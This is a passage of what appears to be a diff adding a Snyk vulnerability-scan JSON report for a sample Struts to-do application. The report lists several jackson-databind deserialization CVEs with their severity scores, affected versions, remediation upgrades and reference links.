every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.6 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/28badf7ef60ac3e7ef151cd8e8ec010b8479226a)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2058)\n", + "epssDetails": { + "percentile": "0.82708", + "probability": "0.00890", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-12023" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-6wqp-v4v6-c87c" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:16:09.944095Z", + "functions_new": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-05-29T17:15:50Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-10-11T17:15:49Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:43.326081Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72448", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.7)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2097", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:45.223431Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:22.234808Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:46.637612Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:45.223431Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:22.234808Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks via the ` slf4j-ext` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14718`) is not identical to `CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n", + "epssDetails": { + "percentile": "0.92634", + "probability": "0.04626", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-14718" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-645p-88qh-w398" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:21:07.540945Z", + "functions_new": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-27T17:19:49Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-10-11T17:19:41Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:22.234808Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72449", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.7)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2097", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:48.008907Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:48:33.930153Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:39.195569Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:48.008907Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:33.930153Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform an XML External Entity (XXE) Injection via the `JDK` classes due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14720`) is not identical to `CVE-2018-12018`, `CVE-2018-14729`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n", + "epssDetails": { + "percentile": "0.84205", + "probability": "0.01052", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-14720" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-x2w5-5m2g-7h5m" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:21:22.141403Z", + "functions_new": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-27T17:20:17Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-10-11T17:19:17Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:33.930153Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72450", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.7)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2097", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/blob/a066415d66a6b1a4688ff0ed25695aa3a86ac130/release-notes/VERSION-2.x", + "title": "GitHub Release Notes" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:48.151247Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:21.823657Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:39.120318Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:48.151247Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:51:21.823657Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack via the `blaze-ds-opt` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14719`) is not identical to `CVE-2018-12018`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n- [GitHub Release Notes](https://github.com/FasterXML/jackson-databind/blob/a066415d66a6b1a4688ff0ed25695aa3a86ac130/release-notes/VERSION-2.x)\n", + "epssDetails": { + "percentile": "0.85805", + "probability": "0.01269", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-14719" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-4gq5-ch57-c2mg" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:23:45.326350Z", + "functions_new": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-27T17:22:45Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-10-11T17:22:38Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:21.823657Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72451", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.7)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2097", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", + "cvssV3BaseScore": 10, + "modificationTime": "2024-03-11T09:46:43.143163Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N", + "cvssV3BaseScore": 6.8, + "modificationTime": "2024-03-11T09:51:21.774444Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:20.565013Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 10, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:43.143163Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 6.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:51:21.774444Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A malicious user could perform a SSRF attack via the `axis2-jaxws` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14721`) is not identical to `CVE-2018-12018`, `CVE-2018-14719`, `CVE-2018-14720`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n", + "epssDetails": { + "percentile": "0.85710", + "probability": "0.01257", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-14721" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-9mxf-g3x6-wv74" + ] + }, + "packageName": 